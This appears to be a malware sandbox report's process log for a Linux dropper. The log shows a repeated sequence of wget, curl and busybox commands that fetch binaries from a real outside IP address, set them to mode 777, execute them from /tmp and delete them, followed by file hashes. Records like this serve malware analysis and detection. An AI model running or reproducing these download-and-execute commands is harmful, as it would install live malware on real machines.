/bin/rmrm 6MgSwtcrgRdpWdkIWJa1jdOdSiocuOtPWj2⤵PID:956
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:957
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:958
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:959
-
-
/bin/chmodchmod 777 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA./4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm 4TOW8fpeWPUedySDj3Bn7JwNFSehOimCjA2⤵PID:962
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:963
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:965
-
-
/bin/chmodchmod 777 fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- File and Directory Permissions Modification
PID:966
-
-
/tmp/fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL./fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵
- Executes dropped EXE
PID:967
-
-
/bin/rmrm fohPRCfDwbUa538sCvtsJfDnNvMCnj35YL2⤵PID:968
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:969
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:970
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:971
-
-
/bin/chmodchmod 777 G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- File and Directory Permissions Modification
PID:972
-
-
/tmp/G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp./G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵
- Executes dropped EXE
PID:973
-
-
/bin/rmrm G8rtwMrqfQ3aU5gj7b59hiJSQ7sGjeDMnp2⤵PID:974
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:975
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:976
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:977
-
-
/bin/chmodchmod 777 Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- File and Directory Permissions Modification
PID:978
-
-
/tmp/Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN./Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵
- Executes dropped EXE
PID:979
-
-
/bin/rmrm Pc1FZXKrrtv2wcDqtpVViWjyhlu7tQ0fiN2⤵PID:980
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:981
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:982
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:983
-
-
/bin/chmodchmod 777 ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- File and Directory Permissions Modification
PID:984
-
-
/tmp/ukydHV98yzuiaTZfLkSAjstPpW905BtH3z./ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵
- Executes dropped EXE
PID:985
-
-
/bin/rmrm ukydHV98yzuiaTZfLkSAjstPpW905BtH3z2⤵PID:986
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:987
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:988
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:989
-
-
/bin/chmodchmod 777 AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs./AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm AtHo16jIBXpk2LiRB7IDfuaxVfx8E1TbZs2⤵PID:992
-
-
/usr/bin/wgetwget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:993
-
-
/usr/bin/curlcurl -O http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Reads runtime system information
- Writes file to tmp directory
PID:994
-
-
/bin/busybox/bin/busybox wget http://87.120.84.230/bins/djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:995
-
-
/bin/chmodchmod 777 djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- File and Directory Permissions Modification
PID:996
-
-
/tmp/djVle6T71YXXfjsEnSm4CZ6stk0wE9n003./djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵
- Executes dropped EXE
PID:997
-
-
/bin/rmrm djVle6T71YXXfjsEnSm4CZ6stk0wE9n0032⤵PID:998
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97